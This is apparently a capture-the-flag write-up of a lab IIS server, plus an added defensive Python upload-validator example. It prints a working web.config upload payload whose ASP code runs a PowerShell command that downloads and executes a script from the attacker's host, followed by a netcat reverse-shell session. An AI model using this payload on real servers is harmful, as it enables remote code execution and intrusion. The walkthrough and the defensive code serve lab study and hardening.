2 :80
===============================================================
2021/05/03 17:53:31 Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx (Status: 200) [Size: 941]
/UploadedFiles (Status: 301) [Size: 156] [--> http://10.10.10.93/UploadedFiles/]
/aspnet_client
<input type="submit" name="btnUpload" value="Upload" onclick="return ValidateFile();" id="btnUpload" />
.png files upload successfully and are viewable afterwards under /UploadedFiles/.
.asp and .aspx are rejected, so the next step is to experiment with file extensions.
Double extensions and null-byte extensions are rejected as well.
Searching for IIS 7.5 file upload exploits shows an RCE technique that works by uploading a web.config file (IIS honours a per-directory web.config, so a dropped one can add a handler mapping and loosen request filtering for that folder):
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
web.config (the uploaded file; the ASP payload is appended after the XML):
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd.exe /c powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
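Added example (not code from the box or this writeup): a Python model of the blocklist-style filter the notes above observe, next to an allowlist validator that also rejects IIS reserved names such as web.config and checks file content by magic bytes. The function names, extension lists and the assumption that the box's filter is a plain extension blocklist are mine.

```python
import os
import re

# Blocklist-style check modelled on the behaviour observed above (assumption):
# .asp/.aspx rejected, double extensions and null bytes rejected, .png accepted.
BLOCKED_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".exe"}


def blocklist_ok(filename: str) -> bool:
    """Blocklist-only check. Anything not on the list, e.g. .config, gets through."""
    if "\x00" in filename or filename.count(".") > 1:
        return False
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTS


# Allowlist: permitted extension -> magic bytes the file content must start with.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
# Names IIS / ASP.NET interpret themselves if they land in a served directory.
RESERVED_NAMES = {"web.config", "global.asax", "machine.config"}
# One stem, no dots, so "shell.aspx.png" and similar can never pass.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def allowlist_ok(filename: str, head: bytes) -> bool:
    """Allowlist check: strip any path, reject reserved names and null bytes,
    require exactly one permitted extension and matching magic bytes.
    The client-supplied Content-Type is deliberately not consulted."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in base or base.lower() in RESERVED_NAMES:
        return False
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED or not SAFE_STEM.match(stem):
        return False
    return head.startswith(ALLOWED[ext])
```

Independently of upload validation, locking the upload directory with a `<location path="..." overrideMode="Deny">` element in applicationHost.config stops IIS from honouring any web.config dropped there.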
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.93] 49160
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
bounty\merlin